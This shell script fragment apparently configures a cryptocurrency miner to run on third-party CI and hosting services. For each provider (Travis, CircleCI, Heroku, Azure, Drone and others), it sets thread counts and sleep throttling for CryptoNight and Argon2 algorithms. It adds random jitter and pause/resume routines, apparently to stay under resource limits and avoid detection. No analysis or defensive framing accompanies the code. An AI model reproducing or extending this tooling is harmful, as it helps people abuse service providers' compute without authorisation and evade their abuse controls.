## tuning for third party services

tune_thirdparty() {
    export base threads provider
    export csleep=$CSLEEP
    if type "$provider"; then
        log "tune_thirdparty - provider: $provider"
        $provider
    else
        log "no provider available skipping 3rd party tuning"
        return 1
    fi

    cThr=${threads:-$cThr}
    ## use change config to override
    change_config threads "$cThr"
    if [ "$csleep" != "$CSLEEP" ]; then
        if [ "$csleep" -gt 0 ] && [ "$CSLEEP" = 0 ]; then
            CSLEEP=1
        else
            CSLEEP=$csleep
        fi
        change_config sleep $CSLEEP
    fi
    return 0
}

should_exec() {
    case "${provider}" in
        heroku) return 1
                ;;
        *) return 0
           ;;
    esac

}

travis() {
    case "$job_algo" in
        "cn-heavy")
            threads=1
            ;;
        "cn")
            threads=1
            ;;
        "cn-lite")
            threads=2
            ;;
        "cn-pico"|"cn-femto"|"argon2")
            threads=2
            ;;
    esac
}

bitrise() {
    case "$job_algo" in
        "cn-heavy")
            threads=1
            ;;
        "cn")
            threads=1
            ;;
        "cn-lite")
            threads=1
            ;;
        "cn-pico"|"cn-femto"|"argon2")
            threads=2
            ;;
    esac
}

circleci() {
    case "$job_algo" in
        "cn-heavy")
            threads=1
            ;;
        "cn")
            threads=1
            ;;
        "cn-lite")
            threads=1
            ;;
        "cn-pico")
            threads=2
            csleep=2000
            ;;
        "cn-femto")
            threads=2
            csleep=133
            ;;
        "argon2")
            threads=2
            csleep=30
            ;;
    esac
}

codefresh() {
    case "$job_algo" in
        "cn-heavy")
            threads=2
            ;;
        "cn")
            threads=2
            ;;
        "cn-lite")
            threads=2
            ;;
        "cn-pico"|"cn-femto")
            threads=3
            ;;
        "argon2")
            threads=4
            ;;
    esac
}

codeship() {
    case "$job_algo" in
        "cn-heavy")
            threads=2
            ;;
        "cn")
            threads=4
            ;;
        "cn-lite")
            threads=4
            ;;
        "cn-pico")
            threads=4
            csleep=4000
            ;;
        "argon2")
            threads=4
            csleep=1000
            ;;
        "cn-femto")
            threads=4
            csleep=266
            ;;
    esac
}

cphp() {
    case "$job_algo" in
        "cn-heavy")
            threads=1
            ;;
        "cn")
            threads=1
            ;;
        "cn-lite")
            threads=1
            ;;
        "cn-pico"|"cn-femto"|"argon2")
            threads=2
            ;;
    esac
}

docker(){
    case "$job_algo" in
        "cn-heavy")
            threads=1
            ;;
        "cn")
            threads=1
            ;;
        "cn-lite")
            threads=1
            ;;
        "cn-pico"|"cn-femto"|"argon2")
            threads=1
            ;;
    esac
}

quay() {
        case "$job_algo" in
            "cn-heavy")
                threads=2
                ;;
            "cn")
                threads=4
                ;;
            "cn-lite")
                threads=2
                ;;
            "cn-pico"|"cn-femto"|"argon2")
                threads=2
                ;;
        esac
}

drone() {
    case "$job_algo" in
        "cn-heavy")
            threads=2
            ;;
        "cn")
            threads=4
            ;;
        "cn-lite")
            threads=2
            ;;
        "cn-pico"|"cn-femto"|"argon2")
            threads=2
            ;;
    esac
}

semaphore() {
    case "$job_algo" in
        "cn-heavy")
            threads=2
            ;;
        "cn")
            threads=4
            ;;
        "cn-lite")
            threads=4
            ;;
        "cn-pico"|"cn-femto"|"argon2")
            [ "$CORES" = 2 ] && threads=2 || threads=4
            ;;
    esac
}

wercker() {
    case "$job_algo" in
        "cn-heavy")
            threads=2
            ;;
        "cn")
            threads=4
            ;;
        "cn-lite")
            threads=4
            ;;
        "cn-pico"|"cn-femto"|"argon2")
            threads=4
            ;;
    esac
}

appv() {
    {
        case "$job_algo" in
            "cn-heavy")
                threads=1
                csleep=75000
                ;;
            "cn")
                threads=2
                csleep=50000
                ;;
            "cn-lite")
                threads=2
                csleep=30000
                ;;
            "cn-pico")
                threads=2
                csleep=6666
                ;;
            "argon2")
                threads=2
                csleep=2222
                ;;
            "cn-femto")
                threads=2
                csleep=1333
                ;;
        esac
    }
}

azure() {
    case "$job_algo" in
        "cn-heavy")
            threads=2
            ;;
        "cn")
            threads=2
            ;;
        "cn-lite")
            threads=2
            ;;
        "cn-pico"|"cn-femto")
            threads=2
            ;;
    esac
}

heroku() {
        case "$job_algo" in
            "cn-heavy")
                threads=1
                csleep=24000
                ;;
            "cn")
                threads=1
                csleep=16000
                ;;
            "cn-lite")
                threads=2
                csleep=32000
                ;;
            "cn-pico")
                threads=8
                csleep=50000
                ;;
            "cn-femto")
                threads=8
                csleep=72000
                ;;
        esac
}

oc() {
    case "$job_algo" in
        "cn-heavy")
            threads=2
            ;;
        "cn")
            threads=2
            ;;
        "cn-lite")
            threads=2
            ;;

        "cn-pico"|"cn-femto"|"argon2")
            threads=4
            csleep=$((2500+RANDOM%250))
            ;;
    esac
}



buddy() {
    case "$job_algo" in
        "cn-heavy")
            threads=2
            ;;
        "cn")
            threads=2
            ;;
        "cn-lite")
            threads=2
            ;;
        "cn-pico"|"cn-femto")
            threads=2
            ;;
    esac
}

heroku_start(){
    pause
    fleep $((RANDOM%10+20))
    resume
}
